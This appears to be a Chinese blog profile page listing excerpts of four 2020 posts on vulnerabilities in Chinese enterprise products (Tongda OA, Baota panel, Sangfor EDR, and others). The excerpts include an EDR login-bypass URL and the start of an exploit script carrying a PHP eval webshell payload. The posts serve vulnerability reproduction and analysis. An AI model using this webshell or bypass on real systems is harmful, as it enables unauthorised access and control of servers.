自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4)
  • 收藏
  • 关注

原创 2020HW期间0day快报集合[ 每日更新 ]

目录0x01 天融信TopApp-LB 负载均衡系统sql注入0x02 用友GRP-u8 注入0x03 绿盟UTS综合威胁探针管理员任意登录0x04 齐治堡垒机前台远程命令执行漏洞(无需登录)0x05 泛微OA云桥任意文件读取漏洞0x06 Exchange Server 远程代码执行漏洞(POC未验证)0x07 联软科技产品【准入】存在任意文件上传和命令执行漏洞0x08 通达0A v11.7 后台SQL注入导致RCE0x09 天融信数据防泄漏系统越权修改管理员密码目前

2020-09-15 14:54:22 1745

原创 宝塔7.4.2未授权访问漏洞,吃瓜看黑阔删库挂黑页

注:因个别原因无法自行复现,转载自各公众号,略微进行修改添加0x01 漏洞复现下载linux7.4.2版本宝塔,使用root用户执行(当前使用centos系统),添加权限安装7.4.2linux版本下载链接:https://pan.baidu.com/s/1nUMGvof_9I4JdVtk2Z0sMA 提取码:stujchmod +x install.sh ./install.sh安装完成后,会回显用户密码以及登陆地址踩坑点:登录后,分别安装apache2.4、mysql、p

2020-08-24 14:27:22 1377

原创 某信服EDR任意用户登陆漏洞分析

影响范围: EDR <= v3.2.19漏洞描述: 终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。0x01 漏洞复现/ui/login.php?user=usernameusername 可能会有变动需要f...

2020-08-20 09:48:06 2192

原创 通达OA v11.6 RCE漏洞分析

hvv爆出rce按照网上exp进行复现成功获取shell,复现方式自行搜索(很多)比较好奇 为什么要删除文件这里从exp着手分析import requests target="http://192.168.159.137:8080/"payload="<?php eval($_POST['agan']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")

2020-08-19 17:32:30 1514 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除